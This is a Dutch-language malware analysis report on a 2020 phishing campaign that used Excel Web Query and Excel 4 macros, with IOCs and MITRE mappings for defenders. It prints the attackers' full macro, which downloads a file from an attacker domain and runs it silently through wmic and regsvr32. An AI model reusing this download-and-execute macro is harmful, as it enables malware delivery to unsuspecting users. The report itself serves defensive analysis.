Hoewel misbruik van Excel Web Query (IQY) niets nieuws is in malware [1]waren er bij een recent geval niet alleen de Hornetsecurity Security Lab-onderzoekers, maar ook andere onderzoekers [3][6] in de war. Een e-mail spam campagne welke kwaadaardige Excel-documenten aflevert in zip bestanden die uiteindelijk alleen de Windows Calculator-applicatie starten op de computers van analisten, mogelijk, in een poging om af te leiden van hun werkelijke af te leveren bestand aan slachtoffers. Het Security Lab ontrafelt de zaak in dit rapport.

De procedure

De kwaadaardige documenten worden gedistribueerd als gearchiveerde zipbijlagen met de naam factuur*.xls.zip, waarbij het * deel het enige variabele onderdeel is. Het bijbehorende e-mailbericht is erg kort, soms zonder begroeting en soms met, maar verwijst het slachtoffer altijd naar de bijlage zonder verdere tekst:

Email Example Malware Scam

Eenmaal uitgepakt en geopend, genereert het document een pop-up met het nepdialoogbericht, waarin staat: “We hebben een probleem gevonden met bepaalde inhoud. Wil je proberen dat we zoveel mogelijk herstellen?”:

Email Example Office Excel Scam

Vervolgens gebruikt het document Excel Web Query om verdere macrocode te downloaden vanaf een externe locatie.
Zo’n waargenomen macrocode downloadde en startte een executable (geïdentificeerd als w32-dll-run-shellcode.dll), dat op zijn beurt de Windows Calculator-toepassing calc.exe uitvoert.

Het Hornetsecurity Security Lab is van mening dat dit niet de beoogde “payload” was/is. Echter, uit OSINT-onderzoek en correlatie met andere bronnen, was de enige bevestigde geleverde “payload” w32-dll-run-shellcode.dll. Het is niet bekend of er op enig ander moment een kwaadaardige payload in plaats van w32-dll-run-shellcode.dll is afgeleverd. Evenmin is bekend of w32-dll-run-shellcode.dll opzettelijk of per vergissing wordt/werd uitgevoerd.

Technische Analyse

Document

Het document heeft een verborgen pagina:

Hidden Sheet Example

In de cellen van deze verborgen pagina is de macrocode te zien van de vorige outlined decoy pop up.

Inside Hidden Sheet Malwarescam

Wanneer het document zonder internet wordt uitgevoerd, wordt er een foutbericht weergegeven met de schadelijke URL die is geprobeerd te laden:

Unable to Open URL Malwarescam

Bij het uitvoeren van het document met internet en het verzoek wordt doorgeven, ontvang je een algemeen antwoord Web query error:

Web Query Error MalwareScam

Dit feit wetende, de Data Connections van de Workbook kunnen worden onderzocht om de Web Query connection reeks te onthullen:

Web Query Connection String MalwareScam

Helaas kon het Excel Web Query (IQY) -bestand niet worden geladen en werden HTTP-verbindingen via een 301-code omgeleid naar https://www.google.com/. Dit is een bekende techniek om te voorkomen dat onderzoekers toegang krijgen tot het payload. Dit kan gebeuren op basis van IP-adres ranges of zogenaamde geofencing, waardoor alleen het netwerk van het beoogde slachtoffer toegang heeft tot de payload, of de URL kan alleen een specifiek aantal downloads van de payload toestaan voordat ze worden omgeleid.

Uit andere bronnen is bekend dat één Excel Web Query-verzoek is geretourneerd:

Source Code MalwareScam

Terwijl de =CLOSE(FALSE) commands Excel instrueerd om het Workbook te sluiten, onderzoeken we de basis URL verder  /lander/excel4_158158672/index.html. Het werd echter ook omgeleid naar https://www.google.com/.

Uiteindelijk, /lander/excel4 geeft de volgende Excel 4 macro:

=CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://merystol.xyz/SDVsdv23r”,”c:\\Users\\Public\\fbafb4234.html”,0,0)

=IF(ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.”,2), WAIT(NOW()+”00:00:01″), )


=EXEC(“wmic process call create “”regsvr32 -s c:\\Users\\Public\\fbafb4234.html”””)


=CLOSE(FALSE)

 

Deze macro download een bestand van https://merystol.xyz/SDVsdv23r naar c:\\Users\\Public\\fbafb4234.html via urlmon.URLDownloadToFileA. Start vervolgens regsvr32 via wmic process call gemaakt om onopgemerkt (-s switch) de gedownloade DLL te registreren.

En hier wordt de zaak interessant: terwijl de bovenstaande URL op https://merystol.xyz/SDVsdv23r tijdens onze analyse werd doorverwezen naar https://www.google.com/, kan vanuit VirusTotal worden gezien dat de URL op een bepaald moment in het verleden een bestand met de hash 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb [2] bevatte.

MalwareScam VirusTotal Screenshot

De w32-dll-run-shellcode.dll is zeer kaal en bevat geen imports en nauwelijks strings:

$ strings 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb.bin !This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.reloc
RhcalcTYRQd
WinEu
w32-dll-run-shellcode.dll
_DllMain@12

Githubtribution via de w32-dll-run-shellcode.dll string leidt naar https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/build_config.py (een kloon van het oorspronkelijke project op https: //code.google.com/archive/p/win-exec-calc-shellcode/). De code in vragen is identiek met https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/w32-exec-calc-shellcode.asm. Dit is oude PoC-code van een aanstootgevende beveiligingsonderzoeker die calc.exe uitvoert.

De download van deze w32-dll-run-shellcode.dll is ook waargenomen door andere onderzoekers [3].

Dezelfde w32-dll-run-shellcode.dll was ook beschikbaar op https://brinchik.xyz/Qz8ZNnxg [4]. Een domein- en URL-naamschema dat past bij de malware die hier wordt waargenomen. Diezelfde URL had een routebeschrijving naar een URL die Ursnif downloadde. Dit werd eerder geanalyseerd door een andere onderzoeker [5]. Dit betekent dat het waarschijnlijk is, dat de uitvoering van calc.exe een berekende zet is van de aanvallers om de analyse van de werkelijke payload af te leiden. Of deze campagne gerelateerd is aan Ursnif en welke actor, kan op dit moment echter niet worden bepaald.

Levering

De e-mails worden verzonden vanaf echte aol.com (89%) en wp.pl (11%) e-mailaccounts. Vandaar dat de e-mails van aol.com ook DMARC-validatie doorstaan. We konden geen hergebruik van e-mailadressen waarnemen, wat betekent dat de bezorging definitief werd gecoördineerd, zodat voor elke mail een schone/nieuw afzender-e-mail werd gebruikt. De ontvangers zouden echter aangeven dat ze niet getarget zijn op een specifieke sector of industriële branche.

E-mails zijn afgeleverd op 2020-02-14, 2020-02-19, 2020-02-20 en 2020-02-21:

Email Delivery History

De afzendernamen volgen het patroon firstname.lastname [0-9a-z]{0,5}@(aol.com|wp.pl).

Het lage aantal e-mails kan er ook op wijzen dat dit een eerste test of demonstratie was van een nieuw kwaadaardig documenttype dat gebruik maakt van Excel Web Queries.

Conclusie en herstel

Deze campagne maakt gebruik van Excel 4-macro’s en Excel Web Queries voor het uitvoeren en afleveren van een – nog onbekende – 2nd stage malware. Dit maakt het waarschijnlijk mogelijk om sommige maatregelingen te omzeilen die alleen naar VBA-macro’s zoeken. Welke payload precies wordt geleverd en of de levering van een 2nd stage die de Calculator applicatie eenvoudig opent, is ontworpen als een analyse-ontwijkingstechniek of als fout is nog onbekend. Het is duidelijk dat de tijd die wordt besteed in de leveringsfase en de omleidingen naar Google op de payload-URL aangeven dat dit waarschijnlijk een berekende afwijking is.

Gebruikers kunnen zichzelf beschermen tegen dit soort kwaadaardige documenten door:

  • het uitschakelen van macro’s en remote content in Office.
  • geen bewerkings- of macrofuncties inschakelen, zelfs niet als dit door een document wordt gevraagd.

Hornetsecurity blokkeert deze stijl van kwaadaardige campagnes al en het Security Lab volgt de situatie verder.

​Indicators of Compromise (IOCs)

Hashes

SHA256Description
018902c1bbfe41581710c5efad2a2c9f516bd7aa98dc8432584520623e7eb2bcDocument
6dcc25eb214c38bc942ffdbe8680a1dec867ac4780aac7262391298d561b5928Document
822054123910494bbb80cc4e46f79f045cc527dc12d89bda4b8b58bd9be417f7Document
dc778302fefac2735c112311736e2050eef7a2b84b1e1569b0456e8349d0715cDocument
e1bf01178976efeedcd277f83bebc02f8f4d687d7348d906950a0a524f3f1a98Document

DNSs

  • doolised.xyz
  • emmnebuc.xyz
  • merystol.xyz
  • veqejzkb.xyz

MITRE ATT&CK techniques

TacticIDNameDescription
Initial AccessT1193Spearphishing AttachmentSends email to obtain initial access.
ExecutionT1204User ExecutionVictim executes the payload.
ExecutionT1047Windows Management InstrumentationWMI was used to execute loading of 2nd stage payload.
Defense EvasionT1117Regsvr32Proxy execution of 2nd stage payload.